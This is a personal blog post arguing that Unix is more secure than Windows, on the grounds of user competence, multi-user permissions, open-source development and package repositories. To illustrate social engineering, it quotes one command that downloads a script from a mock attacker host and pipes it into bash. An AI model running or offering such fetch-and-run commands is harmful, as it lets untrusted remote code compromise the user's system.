Rambling: Unix, Windows, and Security

I've become more and more interested in computer security the more I've read about it. The principles and practices are fascinating. And the theories about why some observable phenomona occur are at least thought provoking.

Here's my short tract on why Unix is more secure than Windows.

To start off, 99% of the lowest 50% on the technical literacy scale use Windows. It's not their fault, they just don't know any better. You need to know enough about computers to know that Macs have advantages over Windows to want a Mac, and you need at least moderate computer usage skill to get anything else on your computer. This means that almost all of the least competent users are using Windows.

Technical competence of the user is the SINGLE BIGGEST FACTOR in the security of any particular system. Consider that if you give an idiot an OpenBSD system (possibly the most secure in the world) and set it up for him and lock him out of configuring anything outside his home directory, there's no guarantee he won't come back to you and say "I was trying to get youtube working and now my files are gone/the computer runs slow/I keep getting popups/Whenever I copy a file it gets deleted/etc. Because even if the user is restricted to their little home folder, all that someone needs to have control of that system is to get the person to run a command like "wget -o - http://skript.kidiz.net/pwnbox.sh | bash -" and then there's no telling what corruption can happen within that profile. The last time I regularly used Windows XP, the only good protection I had was my router (being behind a NAT increases security), and I had no issues at all. (For perfect honesty I also had spybot, but I rarely ran scans, they never found anything, and I never got alerts about registry changes unless I actually changed something.)

Now, computers are dumb. Like cars. They have no idea what you're thinking, they just do what they're told. So who tells your computer what to do other than you? Well, the people that wrote your operating system.

Windows was originally concieved as a single-user operating system, simply a platform to run applications from floppies and later CD's. In such a world, Windows would have been a fairly good operating system, with few and likely easily fixable security issues which would have required hardware access to the machine anyways.

Unix was designed as a multi-user operating system. It shows in various ways, one of the most obvious being the filesystem permissions system (Unix has different read/write/execute permission sets for the user that owns the file, the group that owns it, and what just anyone can do to it). This design lent itself well when networking started to become more and more important. It certainly helped that the original TCP/IP stack was written for BSD (a Unix distribution). It was possible to have network services (such as ftp, telnet, and http servers) run distinct from each other. In a typical modern Unix system, there are various default accounts that the user will never log in with, such as "ftp", "nobody", "daemon", "sys", and many others. There's also the administration-only user, "root". Unix leverages this multiuser permissions system to increase it's security. Even if the ftp server was open to a vulnerability that allowed an intruder to run code, the code would only be executable as the "ftp" user, and thus could not change the startup scripts or delete important files (except the files that the "ftp" user owned, which in practice meant only the things the ftp server required being able to read and write in order to run).

The idea of a single-user system though, is that the program can do whatever it wants, seeing as "only the user would be telling the computer what to do". The computing landscape has changed drastically since then, especially with the rise of the internet. Once you network this system, a single security flaw can let anyone on the network tell that computer what to do, unhindered. After all, "only the user would be telling the computer what to do". The assumption fails in a networking context. Things were better in the NT>2000>XP>Vista line than in the 95>98>ME line, but many problems continued because Microsoft wanted to maintain backward-compatibility.

This leads to the next problem, which is open vs closed source. In this particular context, backward compatibility is necessary because Windows programs are very often distributed ONLY as binaries, the most specific and inflexible instructions that a computer can be given (binaries are extremely difficult to modify without breaking a program, but they are the only thing a computer really understands). You can't change just one little thing without being careful, otherwise it may break an application that depends on it. In the open source world, this isn't a huge issue. Open source means you can see the more high-level instructions that the computer is being given, and change it easily if necessary due to some change in the system. Open source software is more flexible in this regard. Open source software is not just written, compiled, and released, with the creators then being free to sit back and make money off it. Open source software is invariably an ongoing project, and the maintainers make sure that the program works on as many platforms as possible. They have automated the process of building the flexible source code into an executable binary depending on the environment that the binary will be built in. A different binary will be produced if a different function library is present, or a different compiler is available, or the application must run on a different kernel. The process of building it determines what it needs to build depending on what has changed, and builds it so that it works.

Windows must maintain binary compatibility, the most rigid and inflexible kind, requiring that what might now be recognized as bad decisions must still be followed, lest the programs fail to run properly. Unix, in the vast majority of the case, needs to maintain only source compatibility. And even then it is fairly loose, as programmers who prefer different platforms will often "port" a program, change the source code so that it runs on the system that they want it to. The whole system is quite free to grow and develop and change. Something that looked like a good idea 10 years ago may be a stupid idea and a security hole now. Unix systems can fix these problems more easily.

What this means is that old Windows bugs die hard, and new Unix bugs are solved usually within days of their discovery, and often with around an hour of programmer time spent on it.

This leads me right into my next point, repositories. Most free Unices (plural of Unix) have a repository, or a few repositories, for software packages. This is necessary because each system works slightly differently, and the program needs slight modifications to make it run on each system. FreeBSD has a system called "ports". Gentoo has a similar system based on FreeBSD's system, which is called "portage". Ubuntu has a program called Synaptic to manage software. OpenSolaris has pkg. OpenBSD has pkg_add. The iPhone (yes, it runs a variant of Unix) has the App Store, or Cydia if you jailbreak it.

These repositories are trustworthy resources for applications. The programs available in them are (with a few exceptions) free and open-source. To install software, a user often needs to do nothing more than open the package management software, check a box, and click apply. The package manager checks the versions of everything and if there is an incompatibility, the user is notified, and often directed as to what action must be taken to fix it. If there aren't any problems, the package manager, depending how it works will either download a binary and install it, or will download the source code, apply any "patches" needed to make the source code compile into a binary that fits the system, and then installs the binary made from that.

Software management in Windows is comparatively atrocious, dirty, and insecure, requiring first determining what you want a program to do, then looking for a program that merely promises to do that in a place where claims need not be verified and cannot be second-guessed, internet advertising. The Windows user then downloads an executable and runs it. The novice Unix user is not used to running applications from untrusted sources as a normal course of using their computer. The novice Windows user is. The novice Windows user is also rarely if ever warned not to run their normal user account as an administrator. Only recently did Microsoft address this by having even administrator accounts run as regular users and only when necessary would temporarily become the Administrator. It is the literal truth that Windows users execute arbitrary code as root and don't think twice. The repository model is far more secure than Windows' model.

To make things equivalent, the open source method is similar to requiring different versions of a program depending whether you have Windows XP or Windows Vista. The way closed-source software is distributed makes this extremely impractical. On the other hand, for Unix, maintaining backward compatibility is impractical for the purposes many of these systems need to do. Unix is an extremely flexible family of operating systems, running on everything from toasters to cellphones to Roadrunner (currently the world's fastest supercomputer) and everything in between. For the toaster version of Unix (I'm thinking of NetBSD) to have all the same things as the version of Linux running on Roadrunner would simply be stupid. Putting enough hardware in a toaster to run the same networking stack as Roadrunner is obviously impractical. Windows, by contrast, rarely has to run on anything less powerful than a netbook these days. And for what are called "embedded" applications like cellphones, even Microsoft has to make big enough changes to break backward compatibility. You can't run Windows Mobile applications on Xbox, nor run Xbox games on PCs (at least not without "porting" them).

There's no technological reason why Unix couldn't maintain perfect backward compatibility as it kept growing forward. In fact, Sun's Solaris operating system tries to do just that. It's worth noting that a few years ago, Sun released an open-source version of Solaris, called OpenSolaris. While Sun will continue to maintain Solaris and it's backward compatibility with earlier Solaris applications, OpenSolaris has no such requirement in it's releases. Likewise, there's no technological reason why Windows couldn't maintain repositories. What determines this isn't what is technologically possible. The source model tends to direct a project in one direction or another, either toward repositories of ports or toward one-size-fits-all.

I'm just saying that it is neither a coincidence nor a direct causal law that open source projects come up with more secure ways to do things than closed-source ones.

So you can imagine it frustrates me when people say that the main reason Unix doesn't have all these viruses and worms and spyware and adware is because it's too small to pay attention to. Unix is more secure because of the way it is developed. It's more secure because of the way it was originally designed. There is idea, and then there is implementation. It is fallacious to say that the only ways Unix could be more secure than Windows are an effect of popularity, as it is implying that security only exists in implementation. This is not the case.

A rarely used retort which should be obvious is that a single server can be worth well more than a thousand desktops and laptops. What do you think a cracker would rather have control of, your underpowered Vista-burdened desktop with a DSL connection, or a server in a data center with a gigabit Internet connection, probably hosting a MySQL database with possibly sensitive information? It's obvious that the people saying these things think that the only computers that exist are desktops and laptops full of pictures of people's kids and their favorite music and their favorite games. That's all they've ever seen, so that's all the crackers have ever seen. And as Windows is all that they know, they cannot imagine a system so different from Windows as to be more secure in anything but implementation. The crackers are not after sheer numbers of machines. While numbers are good, they also evaluate the value of each specific machine. In short, why would they target your limited Vista desktop rather than some of the Bank of America's Solaris machines? If Unix is more secure only in implementation, as implied, why would they so prevailing go after the small fish when the big prize lays in the equally insecure Unix system?

The user is what makes or breaks the security of a system.

(The word "cracker" was used in this work to mean the same thing as the colloquial meaning of "hacker". However, "hacker" has multiple meanings and not always negative, for instance, a "white hat" hacker is not belligerent or malignant. "Cracker" on the other hand is never used positively.)

No comments: